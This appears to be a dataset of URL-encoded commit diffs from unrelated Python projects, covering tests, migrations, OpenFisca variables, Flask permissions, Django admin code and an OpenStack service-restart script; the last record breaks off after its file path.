@@ -0,0 +1,2022 @@ +%22%22%22Test CLI module%22%22%22%0A%0A%0Aimport os%0Aimport sys%0Aimport tempfile%0Aimport unittest%0Afrom mock import mock_open, patch%0Afrom context import dfman%0Afrom dfman import config, const, core%0A%0A%0Aclass TestMainRuntime(unittest.TestCase):%0A%0A @patch('dfman.core.Config')%0A @patch.object(dfman.core.MainRuntime, 'set_output_streams')%0A def test_run_initial_setup(self, _, mock_config):%0A mc_return = mock_config.return_value%0A # dry run and verbose are set to false with args%0A mc_return.getboolean.return_value = False%0A runtime = dfman.core.MainRuntime(False, False)%0A runtime.run_initial_setup()%0A%0A self.assertFalse(runtime.dry_run)%0A self.assertFalse(runtime.verbose)%0A%0A # verbose is set to true with config file but not with args%0A mc_return.getboolean.return_value = True%0A runtime.run_initial_setup()%0A%0A self.assertTrue(runtime.verbose)%0A%0A def test_get_distro(self):%0A test_os = %5C%0Ab'''%0ANAME=%22Scary Linux%22%0AID=spooky%0APRETTY_NAME=%22Spooky Scary Linux%22%0AANSI_COLOR=%221;32%22%0A'''%0A with tempfile.NamedTemporaryFile() as tmp:%0A tmp.write(test_os)%0A tmp.seek(0)%0A%0A runtime = dfman.core.MainRuntime(False, False)%0A const.SYSTEMD_DISTINFO = tmp.name%0A self.assertEqual(runtime.get_distro(), 'spooky')%0A%0A def test_get_overrides(self):%0A test_config = %5C%0Ab'''%0A%5BOverrides%5D%0Afile1 = dir1/file1%0Afile2 = dir2/file2%0A%0A%5Bspooky%5D%0Afile2 = distoverride/file2%0A'''%0A with tempfile.NamedTemporaryFile() as tmp:%0A tmp.write(test_config)%0A tmp.seek(0)%0A config = dfman.Config()%0A config.cfg_file = tmp.name%0A config.load_cfg()%0A%0A runtime = dfman.core.MainRuntime(False, False)%0A runtime.config = config%0A runtime.distro = 'spooky'%0A overrides = runtime.get_overrides()%0A%0A self.assertEqual(overrides%5B'file1'%5D, 'dir1/file1')%0A self.assertEqual(overrides%5B'file2'%5D, 'distoverride/file2')%0A%0A%0A%0A%0Aif __name__ == '__main__':%0A unittest.main()%0A
be59230531d98dc25f806b2290a51a0f4fde1d3b
Rename model to prevent crash during module upgrade in tests
addons/survey/migrations/8.0.2.0/pre-migration.py
addons/survey/migrations/8.0.2.0/pre-migration.py
Python
0
@@ -0,0 +1,236 @@ +# coding: utf-8%0Afrom openupgradelib import openupgrade%0A%0A%[email protected]()%0Adef migrate(cr, version):%0A    openupgrade.rename_tables(cr, %5B('survey', 'survey_survey')%5D)%0A    openupgrade.rename_models(cr, %5B('survey', 'survey.survey')%5D)%0A
a277a25014c250c04fabb669013305940c867abc
Introduce new variables
openfisca_country_template/variables/stats.py
openfisca_country_template/variables/stats.py
Python
0.000007
@@ -0,0 +1,1654 @@ +# -*- coding: utf-8 -*-%0A%0A# This file defines the variables of our legislation.%0A# A variable is property of a person, or an entity (e.g. a household).%0A# See http://openfisca.org/doc/variables.html%0A%0A# Import from openfisca-core the common python objects used to code the legislation in OpenFisca%0Afrom openfisca_core.model_api import *%0A# Import the entities specifically defined for this tax and benefit system%0Afrom openfisca_country_template.entities import *%0A%0A%0Aclass total_benefits(Variable):%0A column = FloatCol%0A entity = Household%0A definition_period = MONTH%0A label = %22Sum of the benefits perceived by a household%22%0A reference = %22https://stats.gov.example/benefits%22%0A%0A def formula(household, period, parameters):%0A basic_income_i = household.members('basic_income', period) # Calculates the value of basic_income for each member of the household%0A%0A return (%0A + household.sum(basic_income_i) # Sum the household members basic incomes%0A + household('housing_allowance', period)%0A )%0A%0A%0Aclass total_taxes(Variable):%0A column = FloatCol%0A entity = Household%0A definition_period = MONTH%0A label = %22Sum of the taxes paid by a household%22%0A reference = %22https://stats.gov.example/taxes%22%0A%0A def formula(household, period, parameters):%0A income_tax_i = household.members('income_tax', period)%0A social_security_contribution_i = household.members('social_security_contribution', period)%0A%0A return (%0A + household.sum(income_tax_i)%0A + household.sum(social_security_contribution_i)%0A + household('housing_tax', period.this_year) / 12%0A )%0A
4af5ec8c040cc1e1eae6b6208bb7e2cfeac7e146
Allow custom Permissions to take Requests or Divisions
evesrp/auth/__init__.py
evesrp/auth/__init__.py
import re from collections import namedtuple from functools import partial from flask.ext.login import current_user from flask.ext.principal import Permission, UserNeed, RoleNeed, identity_loaded from flask.ext.wtf import Form from wtforms.fields import SubmitField, HiddenField from .. import app, db, login_manager, principal class AuthForm(Form): submit = SubmitField('Login') @classmethod def append_field(cls, name, field): setattr(cls, name, field) return cls class AuthMethod(object): name = 'Base Authentication' def form(self): """Return an instance of the form to login.""" return AuthForm.append_field('auth_method', HiddenField(default=self.name)) def login(self, form): """Process a validated login form. You must return a valid response object. """ pass def list_groups(self, user=None): pass @classmethod def register_views(cls, app): """Register views (if needed). This is an optional method to implement. """ pass # Work around some circular imports from .models import User, Group, Division @login_manager.user_loader def login_loader(userid): """Pull a user object from the database. This is used for loading users from existing sessions. """ return User.query.get(int(userid)) # This can be confusing, so here goes. Needs really only need to be tuples, of # some unspecified (but known) length. So, we create named tuples, and then to # make creating them easier freeze the first argument using partial. ReimbursementNeed = namedtuple('ReimbursementNeed', ['method', 'division']) SubmitRequestsNeed = partial(ReimbursementNeed, 'submit') ReviewRequestsNeed = partial(ReimbursementNeed, 'review') PayoutRequestsNeed = partial(ReimbursementNeed, 'pay') # Now, create Permission classes for these kinds of needs. class SubmitRequestsPermission(Permission): def __init__(self, division): need = SubmitRequestsNeed(division.id) super(SubmitRequestsPermission, self).__init__(need) class ReviewRequestsPermission(Permission): def __init__(self, division): need = ReviewRequestsNeed(division.id) super(ReviewRequestsPermission, self).__init__(need) class PayoutRequestsPermission(Permission): def __init__(self, division): need = PayoutRequestsNeed(division.id) super(PayoutRequestsPermission, self).__init__(need) @identity_loaded.connect_via(app) def load_user_permissions(sender, identity): identity.user = current_user if current_user.is_authenticated(): # Set user role (see and modify their own requests)j identity.provides.add(UserNeed(current_user.id)) # Set division roles for role in ('submit', 'review', 'pay'): for division in current_user.divisions[role]: identity.provides.add(ReimbursementNeed(role, division.id)) # If they're an admin, set that if current_user.admin: identity.provides.add(RoleNeed('admin'))
Python
0
@@ -1979,32 +1979,87 @@ init__(self, div +_or_request):%0A if isinstance(div_or_request, Div ision):%0A @@ -2054,24 +2054,28 @@ n):%0A + need = Submi @@ -2080,32 +2080,118 @@ mitRequestsNeed( +div_or_request.id)%0A else:%0A need = SubmitRequestsNeed(div_or_request. division.id)%0A @@ -2316,32 +2316,87 @@ __(self, div +_or_request):%0A if isinstance(div_or_request, Div ision):%0A need @@ -2375,32 +2375,36 @@ est, Division):%0A + need = R @@ -2413,32 +2413,118 @@ iewRequestsNeed( +div_or_request.id)%0A else:%0A need = ReviewRequestsNeed(div_or_request. division.id)%0A @@ -2653,24 +2653,79 @@ elf, div +_or_request):%0A if isinstance(div_or_request, Div ision):%0A @@ -2708,32 +2708,36 @@ est, Division):%0A + need = P @@ -2754,16 +2754,102 @@ stsNeed( +div_or_request.id)%0A else:%0A need = PayoutRequestsNeed(div_or_request. division
becba80983c5f0f29f981eadcc79d4f496e1d28b
fix issue #2778
theme/management/commands/fix_user_quota_model.py
theme/management/commands/fix_user_quota_model.py
Python
0
@@ -0,0 +1,863 @@ +from django.contrib.auth.models import User%0D%0Afrom django.core.management.base import BaseCommand%0D%0A%0D%0Afrom theme.models import UserQuota%0D%0A%0D%0A%0D%0Aclass Command(BaseCommand):%0D%0A help = %22This commond can be run to fix the corrupt user data where some users do not %22 %5C%0D%0A %22have UserQuota foreign key relation. This management command can be run on a %22 %5C%0D%0A %22as-needed basis.%22%0D%0A%0D%0A def handle(self, *args, **options):%0D%0A users = User.objects.filter(is_active=True).filter(is_superuser=False).all()%0D%0A hs_internal_zone = %22hydroshare%22%0D%0A for u in users:%0D%0A uq = UserQuota.objects.filter(user__username=u.username, zone=hs_internal_zone).first()%0D%0A if not uq:%0D%0A # create default UserQuota object for this user%0D%0A new_uq = UserQuota.objects.create(user=u)%0D%0A new_uq.save()%0D%0A
4f1cda8459cb6bca2e317bb582266fb43e78215c
Add test_manager_mixin module.
linguist/tests/test_manager_mixin.py
linguist/tests/test_manager_mixin.py
Python
0
@@ -0,0 +1,1548 @@ +# -*- coding: utf-8 -*-%0Afrom __future__ import unicode_literals%0A%0Afrom .base import BaseTestCase%0A%0Afrom ..models import Translation%0Afrom ..utils.i18n import get_cache_key%0A%0A%0Aclass ManagerMixinTest(BaseTestCase):%0A %22%22%22%0A Tests the Linguist's manager mixin.%0A %22%22%22%0A%0A def setUp(self):%0A self.create_registry()%0A%0A def test_set_instance_cache(self):%0A from ..mixins import set_instance_cache%0A%0A translations = %5Bself.translation_en, self.translation_fr%5D%0A set_instance_cache(self.instance, translations)%0A%0A self.assertEqual(%0A self.instance.cached_translations_count,%0A Translation.objects.count())%0A%0A def test_get_translation_lookups(self):%0A from ..mixins import get_translation_lookups%0A%0A lookups = get_translation_lookups(self.instance)%0A self.assertEqual(lookups, %7B%0A 'identifier': self.instance.identifier,%0A 'object_id': self.instance.pk,%0A %7D)%0A%0A lookups = get_translation_lookups(self.instance, fields=%5B'title', 'body'%5D)%0A self.assertEqual(lookups, %7B%0A 'identifier': self.instance.identifier,%0A 'object_id': self.instance.pk,%0A 'field_name__in': %5B'title', 'body'%5D,%0A %7D)%0A%0A lookups = get_translation_lookups(self.instance, fields=%5B'title'%5D, languages=%5B'en', 'fr'%5D)%0A self.assertEqual(lookups, %7B%0A 'identifier': self.instance.identifier,%0A 'object_id': self.instance.pk,%0A 'field_name__in': %5B'title'%5D,%0A 'language__in': %5B'en', 'fr'%5D,%0A %7D)%0A
326249502d9884ea5717afff63b8a7caf60f6c2c
check in openstack healthcheck tool
planetstack/tools/openstack-healthcheck.py
planetstack/tools/openstack-healthcheck.py
Python
0
@@ -0,0 +1,1871 @@ +#! /usr/bin/python%0Aimport os%0Aimport sys%0Aimport subprocess%0Aimport time%0A%0Adef get_systemd_status(service):%0A p=subprocess.Popen(%5B%22/bin/systemctl%22, %22is-active%22, service%5D, stdout=subprocess.PIPE, stderr=subprocess.PIPE)%0A (out, err) = p.communicate()%0A out = out.strip()%0A return out%0A%0Alibvirt_enabled = os.system(%22systemctl -q is-enabled libvirtd.service%22)==0%0Anova_compute_enabled = os.system(%22systemctl -q is-enabled openstack-nova-compute.service%22)==0%0Aopenvswitch_agent_enabled = os.system(%22systemctl -q is-enabled quantum-openvswitch-agent.service%22)==0%0A%0Aprint %22enabled:%22%0Aprint %22 libvirtd=%22, libvirt_enabled%0Aprint %22 openstack-nova-compute=%22, nova_compute_enabled%0Aprint %22 quantum-openvswitch-agent=%22, openvswitch_agent_enabled%0A%0Aif (not libvirt_enabled) or (not nova_compute_enabled) or (not openvswitch_agent_enabled):%0A print %22services are not enabled. exiting%22%0A sys.exit(0)%0A%0Alibvirt_status = get_systemd_status(%22libvirtd.service%22)%0Anova_compute_status = get_systemd_status(%22openstack-nova-compute.service%22)%0Aopenvswitch_agent_status = get_systemd_status(%22quantum-openvswitch-agent.service%22)%0A%0Aprint %22status:%22%0Aprint %22 libvirtd=%22, libvirt_status%0Aprint %22 openstack-nova-compute=%22, nova_compute_status%0Aprint %22 quantum-openvswitch-agent=%22, openvswitch_agent_status%0A%0Aif (libvirt_status==%22failed%22) or (nova_compute_status==%22failed%22) or (openvswitch_agent_status==%22failed%22):%0A print %22services have failed. doing the big restart%22%0A os.system(%22systemctl stop openstack-nova-compute.service%22)%0A os.system(%22systemctl stop quantum-openvswitch-agent.service%22)%0A os.system(%22systemctl stop libvirtd.service%22)%0A time.sleep(5)%0A os.system(%22systemctl start libvirtd.service%22)%0A time.sleep(5)%0A os.system(%22systemctl start quantum-openvswitch-agent.service%22)%0A time.sleep(5)%0A os.system(%22systemctl start openstack-nova-compute.service%22)%0A print %22done%22%0A%0A%0A%0A%0A
0e5e3deb8a8250429ee7a1603e017343f6c7e3bb
Create a Testing Suite
tests/run_tests.py
tests/run_tests.py
Python
0
@@ -0,0 +1,223 @@ +from unittest import defaultTestLoader, TextTestRunner%0Aimport sys%0A%0Asuite = defaultTestLoader.discover(start_dir=%22.%22)%0Aresult = TextTestRunner(verbosity=2, buffer=True).run(suite)%0Asys.exit(0 if result.wasSuccessful() else 1)%0A
ecac8bc83491c9cb2312cf2a1c477c53c4832b4d
Add minimal dead code elimination
pykit/transform/dce.py
pykit/transform/dce.py
Python
0.000589
@@ -0,0 +1,750 @@ +# -*- coding: utf-8 -*-%0A%0A%22%22%22%0ADead code elimination.%0A%22%22%22%0A%0Afrom pykit.analysis import loop_detection%0A%0Aeffect_free = set(%5B%0A 'alloca', 'load', 'new_list', 'new_tuple', 'new_dict', 'new_set',%0A 'new_struct', 'new_data', 'new_exc', 'phi', 'exc_setup', 'exc_catch',%0A 'ptrload', 'ptrcast', 'ptr_isnull', 'getfield', 'getindex',%0A 'add', 'sub', 'mul', 'div', 'mod', 'lshift', 'rshift', 'bitand', 'bitor',%0A 'bitxor', 'invert', 'not_', 'uadd', 'usub', 'eq', 'noteq', 'lt', 'lte',%0A 'gt', 'gte', 'is_', 'addressof',%0A%5D)%0A%0Adef dce(func, env=None):%0A %22%22%22%0A Eliminate dead code.%0A%0A TODO: Prune branches, dead loops%0A %22%22%22%0A for op in func.ops:%0A if op.opcode in effect_free and len(func.uses%5Bop%5D) == 0:%0A op.delete()%0A%0Arun = dce
2fa7855de542bb5ecd303e26d1e9913687478589
Set up test suite to ensure server admin routes are added.
server/tests/test_admin.py
server/tests/test_admin.py
Python
0
@@ -0,0 +1,2368 @@ +%22%22%22General functional tests for the API endpoints.%22%22%22%0A%0A%0Afrom django.test import TestCase, Client%0A# from django.urls import reverse%0A%0Afrom rest_framework import status%0A%0Afrom server.models import ApiKey, User%0A# from api.v2.tests.tools import SalAPITestCase%0A%0A%0Aclass AdminTest(TestCase):%0A %22%22%22Test the admin site is configured to have all expected views.%22%22%22%0A admin_endpoints = %7B%0A 'apikey', 'businessunit', 'condition', 'fact', 'historicalfact',%0A 'installedupdate', 'machinedetailplugin', 'machinegroup', 'machine',%0A 'pendingappleupdate', 'pendingupdate', 'pluginscriptrow',%0A 'pluginscriptsubmission', 'plugin', 'report', 'salsetting', 'updatehistoryitem',%0A 'updatehistory', 'userprofile'%7D%0A%0A def setUp(self):%0A self.client = Client()%0A self.user = User.objects.create(username='test')%0A%0A def test_no_access(self):%0A %22%22%22Test that unauthenticated requests redirected to login.%22%22%22%0A for path in self.admin_endpoints:%0A response = self.client.get('/admin/server/%7B%7D'.format(path))%0A # Redirect to login page.%0A self.assertEqual(response.status_code, status.HTTP_301_MOVED_PERMANENTLY)%0A%0A def test_ro_access(self):%0A %22%22%22Test that ro requests are rejected.%0A%0A RO users should not have access to the admin site (unless they have%0A %60is_staff = True%60.%0A %22%22%22%0A self.user.user_profile = 'RO'%0A self.user.save()%0A self.client.force_login(self.user)%0A%0A for path in self.admin_endpoints:%0A url = '/admin/server/%7B%7D/'.format(path)%0A response = self.client.get(url)%0A msg = 'Failed for path: %22%7B%7D%22'.format(path)%0A self.assertEqual(response.status_code, status.HTTP_302_FOUND, msg=msg)%0A self.assertEqual(response.url, '/admin/login/?next=/admin/server/%7B%7D/'.format(path),%0A msg=msg)%0A%0A def test_ga_access(self):%0A %22%22%22Ensure GA userprofile grants admin page access.%22%22%22%0A self.user.user_profile = 'GA'%0A self.user.save()%0A self.client.force_login(self.user)%0A%0A for path in self.admin_endpoints:%0A url = '/admin/server/%7B%7D/'.format(path)%0A response = self.client.get(url, follow=True)%0A msg = 'Failed for path: %22%7B%7D%22'.format(path)%0A self.assertEqual(response.status_code, status.HTTP_200_OK, msg=msg)%0A
38b12d0581e82ebb0e4fee8500bbd5d83d373afa
Create wikipedia-link-analysis-reducer.py
wikipedia-link-analysis-reducer.py
wikipedia-link-analysis-reducer.py
Python
0.000008
@@ -0,0 +1 @@ +%0A
38f5c8534e3807d0485165017972adf47bd4aa2f
Create utils.py
utilities/utils.py
utilities/utils.py
Python
0.000001
@@ -0,0 +1,555 @@ +from zope.interface import implements%0A%0Afrom IOperation import IOperation%0A%0A%0Aclass Plus(object):%0A implements(IOperation)%0A%0A def __call__(self, a, b):%0A return a + b%0A%0A%0Aclass Minus(object):%0A implements(IOperation)%0A%0A def __call__(self, a, b):%0A return a - b%0A%0A%0A### alternative way to make utility component (using not class-adviser on class level -%3E using function classImplements)%0A# from zope.interface import classImplements%0A# classImplements(Host, IHost)%0A### also in Python 2.6 and later you can use class decorator @implementer(IFoo)%0A
7801f5a34fed9c50ebd0d426a69f875026da9602
Create tutorial2.py
tutorial2.py
tutorial2.py
Python
0
@@ -0,0 +1 @@ +%0A
0ddac190019753d77b1ed78dcd49ad7370d666df
add some utils
python/irispy/utils.py
python/irispy/utils.py
Python
0.000001
@@ -0,0 +1,647 @@ +import numpy as np%0Aimport irispy%0A%0Adef lcon_to_vert(A, b):%0A poly = irispy.Polyhedron(A.shape%5B1%5D)%0A poly.setA(A)%0A poly.setB(b)%0A V = np.vstack(poly.generatorPoints()).T%0A%0Adef sample_convex_polytope(A, b, nsamples):%0A poly = irispy.Polyhedron(A.shape%5B1%5D)%0A poly.setA(A)%0A poly.setB(b)%0A generators = np.vstack(poly.generatorPoints())%0A lb = np.min(generators, axis=0)%0A ub = np.max(generators, axis=0)%0A%0A n = 0%0A samples = np.zeros((len(lb), nsamples))%0A while n %3C nsamples:%0A z = np.random.uniform(lb, ub)%0A if np.all(poly.A.dot(z) %3C= poly.b):%0A samples%5B:,n%5D = z%0A n += 1%0A return samples
538cd00a3c0307818cf62c61be3d91007a9b4091
Add migration for movie.duration_in_s
migrations/versions/349d38252295_.py
migrations/versions/349d38252295_.py
Python
0.000033
@@ -0,0 +1,627 @@ +%22%22%22Add movie.duration_in_s%0A%0ARevision ID: 349d38252295%0ARevises: 2b7f5e38dd73%0ACreate Date: 2014-01-09 15:31:24.597000%0A%0A%22%22%22%0A%0A# revision identifiers, used by Alembic.%0Arevision = '349d38252295'%0Adown_revision = '2b7f5e38dd73'%0A%0Afrom alembic import op%0Aimport sqlalchemy as sa%0A%0A%0Adef upgrade():%0A ### commands auto generated by Alembic - please adjust! ###%0A op.add_column('movie', sa.Column('duration_in_s', sa.Integer(), nullable=True))%0A ### end Alembic commands ###%0A%0A%0Adef downgrade():%0A ### commands auto generated by Alembic - please adjust! ###%0A op.drop_column('movie', 'duration_in_s')%0A ### end Alembic commands ###%0A
c8ad60f23bc630ba8e57f735c8aa0ec7eeaa3c1f
test ggj18
arquivo3.py
arquivo3.py
Python
0.000001
@@ -0,0 +1,68 @@ +dasdsa%0Asdas%0Asdasd%0Aasdasdas%0A%0As%0Adasdas%0Adas%0Ad%0Aasd%0Aas%0Adas%0Adas%0Adas%0Ad%0Asad%0A
c5bbbe4f6430ef20da55ea0f8039091d4f79c491
Add script to update taking for all team owners
sql/branch.py
sql/branch.py
Python
0
@@ -0,0 +1,324 @@ +import sys%0A%0Afrom gratipay import wireup%0Afrom gratipay.models.participant import Participant%0A%0Adb = wireup.db(wireup.env())%0A%0Ateams = db.all(%22%22%22%0A SELECT t.*::teams%0A FROM teams t%0A%22%22%22)%0A%0Afor team in teams:%0A print(%22Updating team %25s%22 %25 team.slug)%0A Participant.from_username(team.owner).update_taking()%0A%0Aprint(%22Done!%22)%0A
74c58436c28fbca804cd70a88ca1250ca22aa8e6
add test_poll.py
tests/unit/concurrently/condor/test_poll.py
tests/unit/concurrently/condor/test_poll.py
Python
0.00002
@@ -0,0 +1,2021 @@ +# Tai Sakuma%0Aimport os%0Aimport sys%0Aimport logging%0Aimport textwrap%0Aimport collections%0A%0Aimport pytest%0A%0Atry:%0A    import unittest.mock as mock%0Aexcept ImportError:%0A    import mock%0A%0Afrom alphatwirl.concurrently import WorkingArea%0Afrom alphatwirl.concurrently import HTCondorJobSubmitter%0A%0A##__________________________________________________________________%7C%7C%[email protected]()%0Adef mock_proc_condor_q():%0A    ret = mock.Mock()%0A    ret.returncode = 0%0A    return ret%0A%[email protected]()%0Adef mock_pipe(monkeypatch):%0A    ret = mock.Mock()%0A    module = sys.modules%5B'alphatwirl.concurrently.exec_util'%5D%0A    monkeypatch.setattr(module.subprocess, 'PIPE', ret)%0A%0A    return ret%0A%[email protected]()%0Adef mock_popen(monkeypatch, mock_proc_condor_q):%0A    ret = mock.Mock()%0A    ret.side_effect = %5Bmock_proc_condor_q%5D%0A    module = sys.modules%5B'alphatwirl.concurrently.exec_util'%5D%0A    monkeypatch.setattr(module.subprocess, 'Popen', ret)%0A    return ret%0A%[email protected]()%0Adef obj(mock_popen):%0A    return HTCondorJobSubmitter()%0A%0A##__________________________________________________________________%7C%7C%0Adef test_poll(%0A        obj, mock_popen, mock_pipe,%0A        mock_proc_condor_q, caplog):%0A%0A    obj.clusterprocids_outstanding = %5B'3764857.0', '3764858.0', '3764858.1', '3764858.2'%5D%0A%0A    stdout = '%5Cn'.join(%5B'3764857.0 2', '3764858.1 2', '3764858.2 1'%5D)%0A    mock_proc_condor_q.communicate.return_value = (stdout, '')%0A%0A    with caplog.at_level(logging.DEBUG):%0A        ret = obj.poll()%0A%0A    # assert 6 == len(caplog.records)%0A%0A    #%0A    assert %5B'3764857.0', '3764858.1', '3764858.2'%5D == obj.clusterprocids_outstanding%0A%0A    #%0A    expected = %5B'3764858.0'%5D%0A    assert expected == ret%0A%0A    #%0A    expected = %5B%0A        %5B'condor_q', '3764857', '3764858', '-format', '%25d.', 'ClusterId', '-format', '%25d ', 'ProcId', '-format', '%25-2s%5Cn', 'JobStatus'%5D%0A    %5D%0A    procargs_list = %5Bargs%5B0%5D for args, kwargs in mock_popen.call_args_list%5D%0A    assert expected == procargs_list%0A%0A##__________________________________________________________________%7C%7C%0A
9967ade200639b584e379ec25030d1598071ffd3
Create TextEditor.py
redactor/TextEditor.py
redactor/TextEditor.py
Python
0.000001
@@ -0,0 +1,592 @@ +from tkinter import *%0A%0A%0Aclass TextEditor():%0A def __init__(self):%0A self.root = Tk()%0A self.root.wm_title(%22BrickText%22)%0A self.text_panel = Text(self.root)%0A self.text_panel.pack(side=RIGHT, fill=BOTH, expand=YES)%0A self.set_tabs()%0A%0A def start(self):%0A self.root.mainloop()%0A%0A def get_root(self):%0A return self.root%0A%0A def get_text_panel(self):%0A return self.text_panel%0A%0A def set_tabs(self):%0A f = font.Font(font=self.text_panel%5B'font'%5D)%0A tab_width = f.measure(' ' * 3)%0A self.text_panel.config(tabs=(tab_width,))%0A
c037412566b0a0313216e49168a8ebcc831e0f9b
add hamshahri information extractor
hamshahri.py
hamshahri.py
Python
0.000008
@@ -0,0 +1,837 @@ +%0Afrom hazm import sent_tokenize, word_tokenize, Normalizer, HamshahriReader, POSTagger, DependencyParser%0Afrom InformationExtractor import InformationExtractor%0A%0A%0Ahamshahri = HamshahriReader('/home/alireza/Corpora/Hamshahri')%0Anormalizer = Normalizer()%0Atagger = POSTagger()%0Aparser = DependencyParser(tagger=tagger)%0Aextractor = InformationExtractor()%0A%0Aoutput = open('informations.txt', 'w')%0Afor text in hamshahri.texts():%0A%09text = normalizer.normalize(text)%0A%09sentences = %5Bword_tokenize(sentence) for sentence in sent_tokenize(text)%5D%0A%09tagged = tagger.batch_tag(sentences)%0A%09parsed = parser.tagged_batch_parse(tagged)%0A%0A%09for sentence in parsed:%0A%09%09print('%5Cn', '*', *%5Bnode%5B'word'%5D for node in sentence.nodelist if node%5B'word'%5D%5D, file=output)%0A%09%09for information in extractor.extract(sentence):%0A%09%09%09print(*information, sep=' - ', file=output)%0A%0A%09break%0A%0A
a7ece57eec28c771bcf2a23dc9c9e575223b1383
add memory usage profiler script
proto/memory_test/calculate_rebot_model.py
proto/memory_test/calculate_rebot_model.py
Python
0.000001
@@ -0,0 +1,1561 @@ +# Copyright 2008-2011 Nokia Siemens Networks Oyj%0A#%0A# Licensed under the Apache License, Version 2.0 (the %22License%22);%0A# you may not use this file except in compliance with the License.%0A# You may obtain a copy of the License at%0A#%0A# http://www.apache.org/licenses/LICENSE-2.0%0A#%0A# Unless required by applicable law or agreed to in writing, software%0A# distributed under the License is distributed on an %22AS IS%22 BASIS,%0A# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.%0A# See the License for the specific language governing permissions and%0A# limitations under the License.%0A%0Aimport sys, os%0Asys.path.insert(0, os.path.join(os.path.dirname(__file__), '..', '..', 'src'))%0Afrom robot.result.builders import ResultFromXML%0Atry:%0A import psutil%0A import objgraph%0Aexcept ImportError:%0A print %22%22%22%0A Please install psutil and objgraph - this script does not work without them.%0A %22%22%22%0A raise%0A%0Adef calculate_rebot_model(output_path):%0A xml = ResultFromXML(output_path)%0A p = psutil.Process(os.getpid())%0A print 'Process memory usage after xml parsing %25f M' %25 (float(p.get_memory_info().rss) / (1024**2))%0A print 'Most common types'%0A objgraph.show_most_common_types()%0A return xml%0A%0Aif __name__ == '__main__':%0A if len(sys.argv) %3C 2:%0A print %22%22%22%0A Simple memory profiler for robot output xml parsing.%0A Calculates memory usages after result model has been created.%0A usage:%0A calculate_rebot_model.py %5BPATH_TO_OUTPUT_XML%5D%0A %22%22%22%0A else:%0A calculate_rebot_model(sys.argv%5B1%5D)%0A
2e985972aa4aad94bfda25ba852326b39498e4fa
Create Unique_Binary_Search_Trees.py
Array/Unique_Binary_Search_Trees.py
Array/Unique_Binary_Search_Trees.py
Python
0.000001
@@ -0,0 +1,1382 @@ +Given n, how many structurally unique BST's (binary search trees) that store values 1...n?%0A%0AFor example,%0AGiven n = 3, there are a total of 5 unique BST's.%0A%0A 1 3 3 2 1%0A %5C / / / %5C %5C%0A 3 2 1 1 3 2%0A / / %5C %5C%0A 2 1 2 3%0A %0A%0Aclass Solution:%0A # @return an integer%0A # Recursion (172ms)%0A def numTrees_1(self, n):%0A if n %3C= 1: return 1%0A result = 0%0A for i in xrange(1,n+1):%0A result += self.numTrees(i-1)*self.numTrees(n-i)%0A return result %0A %0A # DP (46ms) %0A def numTrees(self, n):%0A result = %5B0 for i in xrange(n+1)%5D%0A result%5B0%5D = 1; result%5B1%5D = 1%0A %0A for i in xrange(2, n+1):%0A for j in xrange(1, n+1):%0A result%5Bi%5D += result%5Bj-1%5D*result%5Bi-j%5D%0A return result%5Bn%5D%0A%0A# status: result%5Bi%5D: the number of unique BST for a sequence of length i.%0A# initialize: result%5B0%5D= 1; result%5B1%5D = 1, only one combination to construct a BST out of a sequence %0A# function: %0Aresult%5Bn%5D = F(1,n) + F%5B2,n%5D +...F%5Bn,n%5D %0AF%5Bi, n%5D: the number of unique BST, where the number i is the root of BST, and the sequence ranges from 1 to n.%0AF%5Bi, n%5D = result%5Bi-1%5D * result%5Bn-i%5D 1%3C= i %3C= n%0Aresult%5Bn%5D = result%5B0%5D*result%5Bn-1%5D + result%5B1%5D*result%5Bn-2%5D+..+result%5Bn-1%5D*result%5B0%5D%0A# result: result%5Bn%5D%0A
e2ba20d629fb35225140008437ddd93bcf516ba7
Add translation for action short descriptions
django_mailbox/admin.py
django_mailbox/admin.py
#!/usr/bin/env python # -*- coding: utf-8 -*- """ Model configuration in application ``django_mailbox`` for administration console. """ import logging from django.conf import settings from django.contrib import admin from django_mailbox.models import MessageAttachment, Message, Mailbox from django_mailbox.signals import message_received from django_mailbox.utils import convert_header_to_unicode logger = logging.getLogger(__name__) def get_new_mail(mailbox_admin, request, queryset): for mailbox in queryset.all(): logger.debug('Receiving mail for %s' % mailbox) mailbox.get_new_mail() get_new_mail.short_description = 'Get new mail' def resend_message_received_signal(message_admin, request, queryset): for message in queryset.all(): logger.debug('Resending \'message_received\' signal for %s' % message) message_received.send(sender=message_admin, message=message) resend_message_received_signal.short_description = ( 'Re-send message received signal' ) class MailboxAdmin(admin.ModelAdmin): list_display = ( 'name', 'uri', 'from_email', 'active', 'last_polling', ) readonly_fields = ['last_polling', ] actions = [get_new_mail] class MessageAttachmentAdmin(admin.ModelAdmin): raw_id_fields = ('message', ) list_display = ('message', 'document',) class MessageAttachmentInline(admin.TabularInline): model = MessageAttachment extra = 0 class MessageAdmin(admin.ModelAdmin): def attachment_count(self, msg): return msg.attachments.count() def subject(self, msg): return convert_header_to_unicode(msg.subject) def envelope_headers(self, msg): email = msg.get_email_object() return '\n'.join( [('%s: %s' % (h, v)) for h, v in email.items()] ) inlines = [ MessageAttachmentInline, ] list_display = ( 'subject', 'processed', 'read', 'mailbox', 'outgoing', 'attachment_count', ) ordering = ['-processed'] list_filter = ( 'mailbox', 'outgoing', 'processed', 'read', ) exclude = ( 'body', ) raw_id_fields = ( 'in_reply_to', ) readonly_fields = ( 'envelope_headers', 'text', 'html', ) actions = [resend_message_received_signal] if getattr(settings, 'DJANGO_MAILBOX_ADMIN_ENABLED', True): admin.site.register(Message, MessageAdmin) admin.site.register(MessageAttachment, MessageAttachmentAdmin) admin.site.register(Mailbox, MailboxAdmin)
Python
0.000001
@@ -212,16 +212,72 @@ rt admin +%0Afrom django.utils.translation import ugettext_lazy as _ %0A%0Afrom d @@ -701,16 +701,18 @@ ption = +_( 'Get new @@ -717,16 +717,17 @@ ew mail' +) %0A%0A%0Adef r @@ -1033,16 +1033,18 @@ = (%0A +_( 'Re-send @@ -1068,16 +1068,17 @@ signal' +) %0A)%0A%0A%0Acla @@ -1599,32 +1599,32 @@ unt(self, msg):%0A - return m @@ -1647,16 +1647,80 @@ ount()%0A%0A + attachment_count.short_description = _('Attachment count')%0A%0A def
f23c77d517dd88c38d5ad8fa0601bc61ccf17aa6
Change url from 2016 to 2017
pyconcz_2017/urls.py
pyconcz_2017/urls.py
